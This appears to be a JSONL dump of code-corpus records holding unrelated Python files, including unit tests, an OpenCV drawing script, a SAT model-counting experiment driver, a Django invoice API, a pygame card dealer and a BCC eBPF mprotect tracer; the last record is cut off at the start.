File(self.CONFIG_FILE)\n file_to_compare = open(self.CONFIG_FILE).read()\n self.assertEqual(file_to_compare, file_instance.read_content())\n\n def test_file_manager_can_get_a_tupe_of_config_file(self):\n file_instance = File(self.CONFIG_FILE)\n x = file_instance.get_tuple_of_file()\n self.assertGreater(len(x), 0)\n\n def test_file_manager_can_get_all_config_from_file(self):\n file_instance = File(self.CONFIG_FILE)\n self.assertEqual(\n file_instance.read_config_parser(\"JSONPARSER\", \"op\"), '0')\n self.assertEqual(file_instance.read_config_parser(\n \"JSONPAHT\", \"json_path\"), 'data/config.json')\n self.assertEqual(\n file_instance.read_config_parser(\"CONFIG_FILE\", \"id\"), '510')\n self.assertEqual(\n file_instance.read_config_parser(\"ENVIRONMENT\", \"env\"), 'PFIZERUS')\n self.assertEqual(\n file_instance.read_config_parser(\"DBNAME\", \"name\"), 'pfizerjaprod')\n\n def test_file_manager_can_get_all_config_db_from_file(self):\n file_instance = File(self.CONFIG_DB_FILE)\n self.assertEqual(file_instance.read_config_parser(\n \"AKTANADEV\", \"host\"), 'google.aktana.com')\n self.assertEqual(\n file_instance.read_config_parser(\"AKTANADEV\", \"user\"), 'user')\n self.assertEqual(\n file_instance.read_config_parser(\"AKTANADEV\", \"pwd\"), 'password')\n\n def test_file_manager_can_create_overwrite_a_file(self):\n file_instance = File(self.CREATE_FILE)\n if file_instance.file_exists() is False:\n file_instance.write_content(\"This is my own test text \"\n \"created\\r\\nby me\")\n else:\n file_instance.write_content(\"This is my own test text \"\n \"overwriteed\\r\\nby me\")\n self.assertTrue(file_instance.file_exists())\n\n def test_file_manager_can_write_a_text_in_a_file(self):\n file_instance = File(self.ADD_TEXT_FILE)\n result = False\n if file_instance.file_exists() is True:\n result = file_instance.add_content(\"\\r\\nThis Line was added at %s\"\n % (datetime.datetime.now()))\n self.assertTrue(result)\n\n def test_file_manager_can_delete_a_file(self):\n file_instance = File(self.DELETE_FILE)\n file_instance.write_content(\"To be deleted\\r\\nby me\")\n result = False\n if file_instance.file_exists() is True:\n result = file_instance.delete()\n self.assertTrue(result)\n\n def test_file_manager_can_update_a_value_in_config_file(self):\n file_instance = File(self.CONFIG_FILE_UPDATE)\n new_value = randint(1, 700)\n file_instance.change_value_config(\"CONFIG_FILE\", \"id\", str(new_value))\n self.assertEqual(file_instance.read_config_parser(\"CONFIG_FILE\", \"id\"),\n str(new_value))\n","sub_path":"test/file_manager_test.py","file_name":"file_manager_test.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425094759","text":"from source.uart.uart import Uart\nfrom source.module import Module\nfrom pathlib import Path\nimport os\nimport math\n\n\nclass Gimbal(Module):\n\tdef __init__(self, parent=None, state=None):\n\t\tself.working_dir = Path(os.path.dirname(os.path.abspath(__file__)))\n\t\tsuper().__init__(self.working_dir, parent=parent, state=state)\n\t\tself.uart = Uart()\n\t\n\tdef truncate_angle(self, angle):\n\t\t\"\"\"\n\t\tTruncates angle to be in range of -180 to 180 degrees\n\n\t\t:param angle: angle to be truncated in degrees\n\t\t:type angle: float\n\t\t:return: 180 if angle is greater than 180, -180 if angle is less than -180, otherwise keeps the same angle\n\t\t:rtype: flat\n\t\t\"\"\"\n\t\tif angle > 180:\n\t\t\treturn 180\n\t\telif angle < -180:\n\t\t\treturn -180\n\t\treturn angle\n\n\t# Processes screen coords and frame and converts them to a set of angles\n\t# returns delta angles\n\tdef process(self, x, y, frame_dims):\n\t\t\"\"\"\n\t\tProcesses screen coords and frame and converts them to a set of angles\n\n\t\t:param x: [description]\n\t\t:type x: [type]\n\t\t:param y: [description]\n\t\t:type y: [type]\n\t\t:param frame_dims: [description]\n\t\t:type frame_dims: [type]\n\t\t:return: delta x and y angles\n\t\t:rtype: list of two floats\n\t\t\"\"\"\n\t\tadjusted_x = (frame_dims[0] / 2) - x\n\t\tadjusted_y = (frame_dims[1] / 2) - y\n\t\thoriz_angle = (adjusted_x / (frame_dims[0] / 2)) * self.properties[\"horiz_fov\"]\n\t\tvert_angle = (adjusted_y / (frame_dims[1] / 2)) * self.properties[\"vert_fov\"]\n\t\treturn self.truncate_angle(horiz_angle), self.truncate_angle(vert_angle)\n","sub_path":"source/gimbal/gimbal.py","file_name":"gimbal.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"597454913","text":"import cv2\nimport numpy as np\nimport pickle\nimport mathrecog as mr\ncap = cv2.VideoCapture(0)\n\npoints = []\n\nflag = 0\n\nwhile(1):\n\n _,frame = cap.read()\n frame = cv2.flip(frame,1)\n\n filterFrame = cv2.GaussianBlur(frame,(35,35),25)\n\n hsvFrame = cv2.cvtColor(filterFrame,cv2.COLOR_BGR2HSV)\n with open('range.pickle','rb') as f:\n t = pickle.load(f)\n lower_bound = np.array([t[0],t[1],t[2]])\n upper_bound = np.array([t[3],t[4],t[5]])\n\n\n threshImg = cv2.inRange(hsvFrame,lower_bound,upper_bound) \n\n _,contours,_ = cv2.findContours(threshImg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n finalImg = cv2.bitwise_and(frame,frame,mask=threshImg)\n\n finalImg = cv2.drawContours(finalImg,contours,-1,(255,255,0),1)\n\n c,X,Y=0,0,0\n\n key = cv2.waitKey(1)\n\n if flag==1:\n for item in contours:\n for i in item :\n X += i[0][0]\n Y += i[0][1]\n c += 1\n\n try: \n points.append([int(X/c),int(Y/c)]) \n except:\n pass\n\n if (key & 0xFF == ord('s')) and flag == 0:\n flag = 1\n\n elif key & 0xFF == ord('s') and flag == 1 :\n flag = 0\n for p in points:\n cv2.circle(finalImg,tuple(p),20,(250,250,250),-1) \n\n cv2.imshow('Draw',finalImg)\n\n if key & 0xFF == ord('q'):\n cv2.imwrite('new.jpg', cv2.bitwise_not(finalImg))\n cap.release()\n cv2.destroyAllWindows()\n break\n\ncv2.destroyAllWindows()\n#cap.release()\n\nmr.test()\n\n\n","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"183561450","text":"import subprocess, os, sys\nimport time\nimport argparse\nfrom partition_random_sample import *\nimport math\n#################\n### argparser ###\n#################\nparser = argparse.ArgumentParser()\nparser.add_argument(\"aiger_file\", help = \"path to aiger circuit unrolling\")\nparser.add_argument(\"aiger_source\", help = \"path to aiger source\")\nparser.add_argument(\"-k\", \"--num_partition_variables\", help = \"number of partitioning variables\", type = int, default = -1)\nparser.add_argument(\"-e\", \"--epsilon\", help = \"epsilon bound on answer with 99% probability\", type = float, default = 2)\nparser.add_argument(\"-ap\", \"--actual_probability\", help = \"don't calculate the exact probability; just use this number\", type = float, default = -1)\nparser.add_argument(\"--method\", action='store', choices=[\"3n/4\",\"n/2\", \"n-5\", \"nlogn\"], help='partitioning technique')\nparser.add_argument(\"--threshold\", help='number of iterations to convergence')\nparser.add_argument(\"--convergence_limit\", help='number of iterations to convergence')\nparser.add_argument(\"--ignore_original\", help = \"run scalmc on the original model\", action = \"store_true\")\nparser.add_argument(\"--ignore_partition\", help = \"run scalmc on the original model\", action = \"store_true\")\nargs = parser.parse_args()\nrun_on_partition = not args.ignore_partition\nrun_on_original = not args.ignore_original\naiger_file = args.aiger_file.split('.a')[0].split('.cnf')[0]\nk = int(args.num_partition_variables)\nnum_clauses = 0\noriginal_count = 0\nn = 0\n#count the number of solutions in the aiger file, generate cnf from aiger file\nos.system(\"./../aiger-1.9.9/aigand \" + aiger_file + \".aig \" + aiger_file + \"and.aig\")\nos.system(\"./../aiger-1.9.9/aigtoaig \" + aiger_file + \"and.aig \" + aiger_file + \".aag\")\nos.system(\"aigcompose \" + args.aiger_source + \" \" + aiger_file + \".aag \" + aiger_file + \"out.aag\")\nos.system(\"python3 aigtocnf_ind.py \" + aiger_file + \"out.aag \" + aiger_file + \".cnf \")\nfilename = aiger_file + \".cnf\"\n\nwith open(filename, 'r') as f:\n found = False\n while not found:\n x = f.readline()\n if \"c ind\" in x:\n n += len(x.split(' ')) - 3\n elif \"p cnf \" in x:\n num_clauses = int(x.split(' ')[-1])\n found = True\n if n is 0:\n n = int(x.split(' ')[-2])\n\nprint(\"File: \" + filename.split('/')[-1].split('.')[0])\n\n#set the parameters appropriately\nepsilon_main = float(args.epsilon)\nepsilon_partition = .01\npivotAC_main = int(math.ceil(9.84 * (1 + (epsilon_main / (1.0 + epsilon_main))) * (1 + (1.0/epsilon_main)) * (1 + (1.0/epsilon_main))))\npivotAC_partition = int(math.ceil(9.84 * (1 + (epsilon_partition / (1.0 + epsilon_partition))) * (1 + (1.0/epsilon_partition)) * (1 + (1.0/epsilon_partition))))\n\n\n#SCALMC ON ORIGINAL\nif run_on_original:\n ##count number of original solutions\n start = time.time()\n info = os.popen(\"./../maxcount/scalmc --pivotAC \" + str(pivotAC_main) + \" --delta .01 \" + filename).readlines()[-1]\n num_sols = info.split(': ')[1].split(' x ')\n base, exp = int(num_sols[1].split('^')[0]), int(num_sols[1].split('^')[1].strip(\"\\n\"))\n original_count += int(num_sols[0]) * base**exp\n end = time.time()\n original_time = end - start\n j = 0\n while original_count % (2**(j+1)) == 0:\n j += 1\n original_count_str = str(original_count/(2**j)) + \" x 2^\" + str(j)\n print(\"Original Probability: \" + str(float(original_count)/(2**n)))\n print(\"epsilon for original = \" + str(epsilon_main))\n print(\"Time for original: \" + str(original_time))\n # print(\"Original Count: \" + original_count_str)\n\n#SCALMC ON PARTITIONS\nif run_on_partition:\n #if k was never specified, calculate it according to the parameters of the cnf file\n if k == -1:\n if args.method == \"3n/4\":\n k = int(.75*n)\n elif args.method == \"n/2\":\n k = int(0.5*n)\n elif args.method == \"nlogn\":\n k = int(n - math.log(n, 2))\n else: \n k = n-5\n print(\"Partitioning Technique: \" + str(args.method))\n print(\"k = \" + str(k))\n convergence_limit = float(args.convergence_limit)\n threshold = int(args.threshold)\n free_vars = n - k\n #partition the file, time it\n start = time.time()\n variable_order = get_top_vars(k, 1000, filename)\n partition_vars = variable_order[:k]\n end = time.time()\n #count number of partitioned solutions\n file_gen_time = end - start\n density_counter = 0\n density_sum = 0.0\n density = 0\n partition_time = 0\n start = time.time()\n file_counter = 0\n converged = False\n partitions = set()\n i = 0\n while not converged:\n #SCALMC ON PARTITIONS\n unsat_partition = False\n old_density = density\n assignment_str = \"\"\n generator = time.time()\n while assignment_str in partitions or assignment_str == \"\":\n assignment_str = random_string_generator(k)\n if len(partitions) == 2**k:\n converged = True\n break\n end_gen = time.time()\n partitions.add(assignment_str)\n write_partition(partition_vars, filename, i, bin_string = assignment_str)\n info = os.popen(\"./../maxcount/scalmc --pivotAC \" + str(pivotAC_partition) + \" --delta .01 \" + filename.split('.cnf')[0] + \"-window-\" + str(i) + \".cnf\").readlines()[-1]\n try:\n num_sols = info.split(': ')[1].split(' x ')\n base, exp = int(num_sols[1].split('^')[0]), int(num_sols[1].split('^')[1].strip(\"\\n\"))\n density_sum += float(int(num_sols[0]) * (base**exp))/(2**(n-k))\n file_counter += 1\n density = density_sum/file_counter\n if abs(density - old_density) <= convergence_limit:\n density_counter += 1\n if density_counter >= threshold:\n if (not allOne and density != 1) or (allOne and density == 1):\n converged = True\n else:\n free_vars = int(free_vars * 2)\n k = n - free_vars\n density_counter = 0\n threshold = int(threshold / 2)\n if k <= 0 or threshold <= 1:\n converged = True\n density = 0\n density_sum = 0\n partition_vars = variable_order[:k]\n partitions = set()\n else:\n density_counter = 0\n except: \n file_counter += 1\n density = density_sum/file_counter\n if abs(density - old_density) > convergence_limit:\n density_counter = 0\n unsat_partition = True\n i += 1\n end = time.time()\n partition_time = end - start\n partition_count = density * 2**n\n i = 0\n # while int(partition_count) % (2**(i+1)) == 0:\n # i += 1\n # partition_count_str = str(int(partition_count)/(2**i)) + \" x 2^\" + str(i)\n print(\"Convergence Limit: \" + str(convergence_limit))\n print(\"Iterations to Convergence - Threshold: \" + str(args.threshold))\n print(\"Partitioned Probability: \" + str(float(partition_count)/(2**n)))\n print(\"Time for partitioned with partitioning overhead : {}\".format(partition_time + file_gen_time))\n print(\"Time for partitioned without partitioning overhead: {}\".format(partition_time))\n print(\"Number of partitions sampled: {}\".format(file_counter))\n # print(\"Partitioned Count: \" + partition_count_str)\n\n# if args.actual_probability == -1:\n# prob = os.popen(\"aigcount \" + aiger_file + \"out.aag\").readlines()[0][:-2]\n# else:\n# prob = args.actual_probability\n# print(\"Actual Probability: \" + str(float(prob)))\n\n# if aiger:\n# os.system(\"./../aiger-1.9.9/aigand \" + aiger_file + \".aig \" + aiger_file + \".aig\")\n# os.system(\"./../aiger-1.9.9/aigtoaig \" + aiger_file + \".aig \" + aiger_file + \".aag\")\n# os.system(\"aigcompose \" + aiger_file + \".aag \" + \"tests/raw_files/source.aag \" + aiger_file + \".aag\")\n# prob = os.system(\"aigcount \" + aiger_file + \".aag\").readlines()\n# print(\"Actual Probability: \" + str(prob))\n","sub_path":"other files/prob_approximator.py","file_name":"prob_approximator.py","file_ext":"py","file_size_in_byte":8115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"1167972","text":"from typing import List\nfrom allianceauth import notifications\nfrom corptools import app_settings\nfrom django.utils.timezone import activate\n\nfrom ninja import NinjaAPI, Form, main\nfrom ninja.security import django_auth\nfrom ninja.responses import codes_4xx\n\nfrom allianceauth.eveonline.models import EveCorporationInfo\nfrom django.core.exceptions import PermissionDenied\nfrom django.db.models import F, Sum, Q\nfrom allianceauth.eveonline.models import EveCharacter\nfrom django.conf import settings\nfrom .app_settings import PAYMENT_CORP\n\nfrom . import models\nfrom . import schema\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\napi = NinjaAPI(title=\"Invoice Manager API\", version=\"0.0.1\",\n urls_namespace='invoices:api', auth=django_auth, csrf=True,\n openapi_url=settings.DEBUG and \"/openapi.json\" or \"\")\n\n\n@api.get(\n \"account/unpaid\",\n response={200: List[schema.Invoice]},\n tags=[\"Account\"]\n)\ndef get_account_invoices(request):\n chars = request.user.character_ownerships.all().values_list('character')\n invoices = models.Invoice.objects.visible_to(\n request.user).filter(paid=False, character__in=chars)\n paid = models.Invoice.objects.visible_to(\n request.user).filter(paid=True, character__in=chars)[:5]\n output = []\n for i in invoices:\n output.append(i)\n for i in paid:\n output.append(i)\n\n return 200, output\n\n\n@api.get(\n \"account/visible\",\n response={200: List[schema.Invoice]},\n tags=[\"Account\"]\n)\ndef get_visible_invoices(request):\n chars = request.user.character_ownerships.all().values_list('character')\n admin_invoices = models.Invoice.objects.visible_to(\n request.user).filter(paid=False).exclude(character__in=chars)\n return 200, admin_invoices\n\n\n@api.get(\n \"config/corp\",\n response={200: schema.Corporation},\n tags=[\"Config\"]\n)\ndef get_payment_corp(request):\n return EveCorporationInfo.objects.get(corporation_id=PAYMENT_CORP)\n","sub_path":"invoices/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"583390200","text":"# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef solution(A):\n # write your code in Python 3.6\n leader = max(A, key=lambda x: A.count(x))\n equi_leaders = 0\n for i in range(1, len(A)):\n seq1, seq2 = A[:i], A[i:]\n \n if seq1.count(leader) > len(seq1)/2 and seq2.count(leader) > len(seq2)/2:\n equi_leaders += 1\n \n return equi_leaders\n","sub_path":"08-leader/EquiLeader.py","file_name":"EquiLeader.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30261419","text":"#!/usr/bin/python3\n\"\"\"Unittest for Square module\"\"\"\n\nfrom models.square import Square\nfrom unittest import TestCase\n\n\nclass TestSquare(TestCase):\n def test_size_get(self):\n \"\"\" Test's for size method \"\"\"\n\n s1 = Square(10, 5, 3, 1)\n self.assertEqual(s1.size, 10)\n\n def test_size_set(self):\n \"\"\" Test's for size method \"\"\"\n\n s1 = Square(10, 5, 3, 1)\n s1.size = 100\n\n self.assertEqual(s1.size, 100)\n\n def test_y_not_int(self):\n \"\"\" Test's for y method \"\"\"\n\n r1 = Square(3, 4, 0, 0)\n\n with self.assertRaises(TypeError):\n r1.y = \"51\"\n\n def test_update(self):\n \"\"\" Test's for update method \"\"\"\n\n s1 = Square(10, 5, 3, 1)\n s1.update(11, 6, 4, 2)\n\n self.assertEqual(s1.id, 11)\n\n self.assertEqual(s1.size, 6)\n\n self.assertEqual(s1.x, 4)\n self.assertEqual(s1.y, 2)\n\n def test_to_dictionary(self):\n \"\"\" Test's for to_dictionary method \"\"\"\n\n test_dict = {'id': 1, 'size': 4, 'x': 2, 'y': 1}\n r1 = Square(4, 2, 1, 1)\n\n self.assertEqual(test_dict, r1.to_dictionary())\n","sub_path":"0x0C-python-almost_a_circle/tests/tests_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"78598917","text":"#Напишите функцию ask_user(), которая с помощью input() спрашивает пользователя “Как дела?”, пока он не ответит “Хорошо”\n#Создайте словарь типа \"вопрос\": \"ответ\", например: {\"Как дела\": \"Хорошо!\", \"Что делаешь?\": \"Программирую\"} и так далее\n#Доработайте ask_user() так, чтобы когда пользователь вводил вопрос который есть в словаре, программа давала ему соотвествующий ответ. Например:\n#Пользователь: Что делаешь?\n#Программа: Программирую\n\ndef ask_user(mydict):\n while True:\n try:\n user_say = input('Пользователь: > ')\n answer = mydict.get(user_say, 'На это мне нечего сказать, лучше бы вы спросили \"Как дела?\"')\n print('Программа: {}'.format(answer))\n except(KeyboardInterrupt):\n print('\\nПрограмма: Ну пока!')\n break\n\n\nmydict = {\n \"Как дела?\": \"Хорошо\",\n \"Что делаешь?\": \"Работаю\",\n \"Кто ты?\": \"Программа\",\n \"Где ты?\": \"Тут\"\n }\n\n\nif __name__ == '__main__':\n ask_user(mydict)","sub_path":"example_while.py","file_name":"example_while.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"315157659","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 23 19:48:56 2020\r\n\r\n@author: Will\r\n\"\"\"\r\n\r\nfrom collections import defaultdict\r\nfrom save_output import save, load\r\nfrom experiments import Experiment\r\nfrom setting import Setting\r\nfrom plots import plot_q, plot_action\r\nfrom games import PD, SignalPD\r\nfrom stats import *\r\n\r\n\r\n['A00', 'A01', 'A02', 'A03', 'A04']\r\n['A11', 'A12', 'A13', 'A14']\r\n['B00', 'B01', 'B02', 'B03', 'B04']\r\n['B11', 'B12', 'B13', 'B14']\r\n['A13b', 'A13c']\r\n['B11b', 'B12b', 'B13b']\r\n['B11c', 'B12c', 'B13c']\r\n['B11d', 'B12d', 'B13d']\r\n\r\n\r\nfor x in ['C1102']:\r\n \r\n e = Experiment(x)\r\n \r\n if x in ['A13b', 'A13c', 'B11b', 'B12b', 'B13b', 'B11d', 'B12d', 'B13d']:\r\n e.run_experiment(trials = 1000, training_period = 20000) \r\n \r\n else:\r\n e.run_experiment(trials = 1000)\r\n \r\n # With 1000 trials, keep only the last 1024 q_values (to reduce file size)\r\n# for trial in e.records['q_values']:\r\n# for player in e.records['q_values'][trial]:\r\n# \r\n# e.records['explore'][trial][player] = e.records['explore'][trial][player][-1024:]\r\n# e.records['action'][trial][player] = e.records['action'][trial][player][-1024:]\r\n# \r\n# for state in e.records['q_values'][trial][player]:\r\n# for action in e.records['q_values'][trial][player][state]:\r\n# e.records['q_values'][trial][player][state][action] = e.records['q_values'][trial][player][state][action][-1024:]\r\n \r\n save(e.records, x)\r\n \r\n #plot_q(exp[x].records)\r\n #plot_action(exp[x].records)\r\n print('Experiment:', x)\r\n a = aggr_avg_rewards(calc_avg_rewards(e.records))\r\n print('Avg. rewards:', a)\r\n o = aggr_outcome_prob(calc_outcome_prob(e.records))\r\n print('Outcome prob:', o, '\\n')\r\n","sub_path":"run_exp.py","file_name":"run_exp.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"375703336","text":"from django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rest_hooks', '0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FailedHook',\n fields=[\n ('id', models.BigAutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('last_retry', models.DateTimeField(auto_now=True, db_index=True)),\n ('target', models.URLField(verbose_name='Original target URL', max_length=255, editable=False, db_index=True)),\n ('event', models.CharField(db_index=True, verbose_name='Event', max_length=64, editable=False, choices=[('customer.created', 'customer.created'), ('customer.deleted', 'customer.deleted'), ('customer.updated', 'customer.updated'), ('invoice.created', 'invoice.created'), ('invoice.deleted', 'invoice.deleted'), ('invoice.updated', 'invoice.updated'), ('plan.created', 'plan.created'), ('plan.deleted', 'plan.deleted'), ('plan.updated', 'plan.updated'), ('proforma.created', 'proforma.created'), ('proforma.deleted', 'proforma.deleted'), ('proforma.updated', 'proforma.updated'), ('provider.created', 'provider.created'), ('provider.deleted', 'provider.deleted'), ('provider.updated', 'provider.updated'), ('subscription.created', 'subscription.created'), ('subscription.deleted', 'subscription.deleted'), ('subscription.updated', 'subscription.updated')])),\n ('payload', models.TextField(editable=False)),\n ('response_headers', models.TextField(max_length=65535, editable=False)),\n ('response_body', models.TextField(max_length=65535, editable=False)),\n ('last_status', models.PositiveSmallIntegerField(editable=False, db_index=True)),\n ('retries', models.PositiveIntegerField(default=1, editable=False, db_index=True)),\n ('hook', models.ForeignKey(editable=False, to='rest_hooks.Hook', on_delete=models.PROTECT)),\n ('user', models.ForeignKey(editable=False, to=settings.AUTH_USER_MODEL, on_delete=models.PROTECT)),\n ],\n options={\n 'ordering': ('-last_retry',),\n },\n ),\n migrations.AlterUniqueTogether(\n name='failedhook',\n unique_together=set([('target', 'event', 'user', 'hook')]),\n ),\n ]\n","sub_path":"rest_hooks_delivery/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"632379337","text":"#!/usr/bin/env python3\n#-*-coding:utf-8-*-\n\n# Create a list that represnts a deck of playing cards,\n# shuffle them and deal 5 cards showing their graphical representation.\n\n# cards[0:13] - 2 - 10, Jack, Queen, King, Ace (Hearths)\n# cards[13:27] - 2 - 10, Jack, Queen, King, Ace (Diamonds)\n# cards[27:40] - 2 - 10, Jack, Queen, King, Ace (Clubs)\n# cards[40:52] - 2 - 10, Jack, Queen, King, Ace (Spades)\n\n# Each card is 81x117.\n\nimport pygame, random\n\nSCREEN_WIDTH = 640\nSCREEN_HEIGHT = 480\nCARD_WIDTH = 81\nCARD_HEIGHT = 117\ncards_image = pygame.image.load(\"cards.gif\")\n\nclass Card:\n def __init__(self, img, posn, card_number):\n self.image = img\n self.card_number = card_number\n self.posn = (posn * (CARD_WIDTH+30))+30, SCREEN_HEIGHT//2\n self.row = (card_number // 13) # Card color\n self.column = (card_number % 13) # Card rank\n self.order = posn\n\n def __str__(self):\n info = \"Card number: {}\\n\".format(self.card_number)\n info += \"Position: {}\\n\".format(self.order)\n info += \"(x,y) : {}\\n\".format(self.posn)\n info += \"Column/rank: {}; row/color: {}\\n\".format(self.column, self.row)\n info += \"Slice: {}\\n\".format((self.column * CARD_WIDTH, self.row * CARD_HEIGHT, CARD_WIDTH, CARD_HEIGHT))\n return info\n\n\n def draw(self, target_surface):\n card_slice = (self.column * CARD_WIDTH, self.row * CARD_HEIGHT, CARD_WIDTH, CARD_HEIGHT)\n target_surface.blit(self.image, self.posn, card_slice)\n\ndef pick_five():\n \"\"\" Returns a list of five integeres from range 0-51. \"\"\"\n deck = list(range(51))\n random.shuffle(deck)\n return deck[0:5]\n\ndef shuffle_cards():\n \"\"\" Shuffle cards and create new hand of five. \"\"\"\n hand = []\n cards_list = pick_five()\n for inx,value in enumerate(cards_list):\n hand.append(Card(cards_image, inx, value))\n return hand\n\ndef main():\n pygame.init()\n my_clock = pygame.time.Clock()\n surface = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n background_color = (0,100,0)\n alive = True\n hand = shuffle_cards()\n\n\n for card in hand:\n print(card)\n\n while alive:\n ev = pygame.event.poll()\n if ev.type == pygame.QUIT:\n alive = False\n if ev.type == pygame.KEYDOWN:\n key = ev.dict[\"key\"]\n if key == 27:\n alive = False\n if key == ord(\"s\"):\n hand = shuffle_cards()\n\n background = (0,0, SCREEN_WIDTH, SCREEN_HEIGHT)\n surface.fill(background_color, background)\n\n for card in hand:\n card.draw(surface)\n\n my_clock.tick(30)\n pygame.display.flip()\n\n pygame.quit()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"How_to_Think_Like_a_Computer_Scientist/chapter17/cards_dealing.py","file_name":"cards_dealing.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"430589685","text":"class Solution(object):\n def findRadius(self, houses, heaters):\n \"\"\"\n :type houses: List[int]\n :type heaters: List[int]\n :rtype: int\n \"\"\"\n \n heaters_set = set()\n for position in heaters:\n heaters_set.add(position)\n\n\nif __name__ == '__main__':\n sol = Solution()\n\n testcase1 = ([1,2,3],[2])\n result1 = sol.findRadius(testcase1[0], testcase1[1])\n print(result1)\n\n testcase2 = ([1,2,3,4],[1, 4])\n result2 = sol.findRadius(testcase2[0], testcase2[1])\n print(result2)\n\n","sub_path":"python/fail.475.py","file_name":"fail.475.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"464297944","text":"#!/usr/bin/python\n# @lint-avoid-python-3-compatibility-imports\n#\n# mprotectsnoop Trace mprotect() syscall.\n# For Linux, uses BCC, eBPF. Embedded C.\n#\n# Written as a basic example of BCC trace & reformat. See\n# examples/hello_world.py for a BCC trace with default output example.\n#\n# Copyright (c) 2015 Andreas Schnebinger.\n# Licensed under the Apache License, Version 2.0 (the \"License\")\n#\n# 16-Sep-2020 Andreas Schnebinger Created this.\n\nfrom __future__ import print_function\nfrom bcc import BPF\n\n# load BPF program\nb = BPF(text=\"\"\"\n#include \n\nstruct data_t {\n u32 pid;\n char comm[TASK_COMM_LEN];\n u64 ts;\n};\n\nBPF_PERF_OUTPUT(events);\n\nvoid syscall__mprotect(void *ctx) {\n struct data_t data = {};\n data.pid = bpf_get_current_pid_tgid();\n bpf_get_current_comm(&data.comm, sizeof(data.comm));\n data.ts = bpf_ktime_get_ns() / 1000;\n events.perf_submit(ctx, &data, sizeof(data));\n};\n\"\"\")\nb.attach_kprobe(event=b.get_syscall_fnname(\"mprotect\"),\n fn_name=\"syscall__mprotect\")\n\n# header\nprint(\"%-6s %-16s %-18s %s\" % (\"PID\", \"CMD\", \"TIME(s)\", \"CALL\"))\n\n# process event\ndef print_event(cpu, data, size):\n event = b[\"events\"].event(data)\n print(\"%-6d %-16s %-18.9f mprotect()\" % (event.pid, event.comm.decode('utf-8', 'replace'), (float(event.ts) / 1000000)))\n\n# loop with callback to print_event\nb[\"events\"].open_perf_buffer(print_event)\nwhile 1:\n try:\n b.perf_buffer_poll()\n except KeyboardInterrupt:\n exit()\n","sub_path":"tools/mprotectsnoop.py","file_name":"mprotectsnoop.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"481583300","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/example_dags/example_pig_operator.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 1230 bytes\nimport airflow\nfrom airflow.models import DAG\nfrom airflow.operators.pig_operator import PigOperator\nargs = {'owner':'airflow', \n 'start_date':airflow.utils.dates.days_ago(2)}\ndag = DAG(dag_id='example_pig_operator',\n default_args=args,\n schedule_interval=None)\nrun_this = PigOperator(task_id='run_example_pig_script',\n pig='ls /;',\n pig_opts='-x local',\n dag=dag)\nrun_this","sub_path":"pycfiles/apache_airflow_arup-1.10.5-py3.6/example_pig_operator.cpython-36.py","file_name":"example_pig_operator.cpython-36.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"479270584","text":"# -*- coding: utf-8 -*-\r\n# _dsmap.py\r\n# Module providing the bilogplot function\r\n# Copyright 2020 Yuki Fukuda\r\n# This file is part of python-deltasigma(forked).\r\n#\r\n# python-deltasigma is a 1:1 Python replacement of Richard Schreier's\r\n# MATLAB delta sigma toolbox (aka \"delsigma\"), upon which it is heavily based.\r\n# The delta sigma toolbox is (c) 2009, Richard Schreier.\r\n#\r\n# python-deltasigma is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# LICENSE file for the licensing terms.\r\n\r\nfrom .._ds_quantize import 